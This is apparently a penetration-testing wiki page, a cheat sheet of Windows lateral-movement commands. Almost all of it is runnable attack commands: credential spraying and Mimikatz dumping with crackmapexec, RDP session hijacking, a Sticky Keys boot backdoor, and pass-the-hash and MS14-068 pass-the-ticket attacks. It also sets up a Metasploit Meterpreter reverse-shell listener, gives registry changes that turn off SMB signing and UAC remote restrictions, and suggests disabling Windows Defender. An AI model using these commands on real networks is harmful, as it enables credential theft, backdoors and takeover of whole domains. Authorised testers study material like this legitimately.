Intro to Lateral Movement Techniques

Penetration Testing Wiki

To check if the credentials $USER / $PASSWORD are used in more computers in the network:

crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers

Or using an Administrator hash and execute Mimikatz for plain text password gathering:

crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py

Run Powerview commands in crackmapexec:

crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose

Tunneling

Traffic Encapsulation tools to bypass deep packet inspection:

http_tunnel
stunnel

Lateral movement with RDP

Exploitation RDP 2011

Technique:
Any user in a local system with NT AUTHORITY/SYSTEM privileges can access any RDP connection done from that machine without knowing the credentials (~~ as “su – user” as root in linux?!)
And the legitimate user is logout immediately

Only using task manager (tscon.exe / tsadmin.msc) as administrator (right click, connect to)

Method 1

psexec -s \\localhost cmd

Method 2

query user
sc create sesshijack binpath="cmd.exe /k  tscon $ID /dest:$SESSIONNAME"
net start sesshijack

Method 3 (with a password as a normal user AND without password as a SYSTEM user)

query user

or:

quser
tscon $ID

Method 4 (physical access, boot backdoor)

Sticky Keys (sethc.exe)

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f


Reboot… and then press 5 times a key to activate Sticky keys or F5 at login screen.

Lateral movement with PTH (Pass The Hash)

Requirement:

SMB connections over ports 139/445 to a writeable share (e.g. C$, admin$)

PTH from Linux

SMB

pth-winexe -U $DOMAIN/administrator%$NT_HASH:$NTLM_HASH //$IP cmd
crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
python wmiexec.py -hashes :$HASH [email protected]$HOST

MS SQL

pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty

RDP

xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389

Metasploit

msf> use exploit/windows/smb/psexec

Crackmapexec + Meterpreter

First, start meterpreter listener:

msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set LHOST $LOCALIP
msf> set exitonsession false
msf> exploit -j
crackmapexec $IP -u administrator -p $PASS -M metinject –o LHOST=$LOCALIP LPORT=444

Crackmapexec + Empire

python empire --rest --user empireadmin --pass Password123!

Edit ~/.cme/cme.conf:

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test

References:

PTH from Windows

For windows use mimikatz or lmpacket wmiexec

PTH with mimikatz:

mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH

That should open a cmd.exe on the target machine.

Check hashes against network

medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
crackmapexec $IP/24 -u Administrator -H $HASH

2018 update

Problems with/Defence systems: UAC

SMB signing required when STATUS_ACCESS_DENIED
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0


WDigest Authentication
"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy” = 1  

Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this.
You wouldn’t even be able to pass the Administrator hash. You would need to turn off Windows Defender first.

Additionally, you might have to edit the Registry.
Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other
local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin,
you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System,
and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.

Lateral movement with PTT (Pass The Ticket)

Attack is against DC with a valid user/ntlm hash

whoami /user
python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc --rc4 <ntlmHash>
python ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> --rc4 <ntmlHash>
klist
klist purge
mimikatz.exe "kerberos::ptc [email protected]" exit` # Generated file must be injected into memory
klist
net use \\$PDC\admin$
net use k: \\$PDC\c$
psexec \\$PDC\ cmd.exe
whoami /groups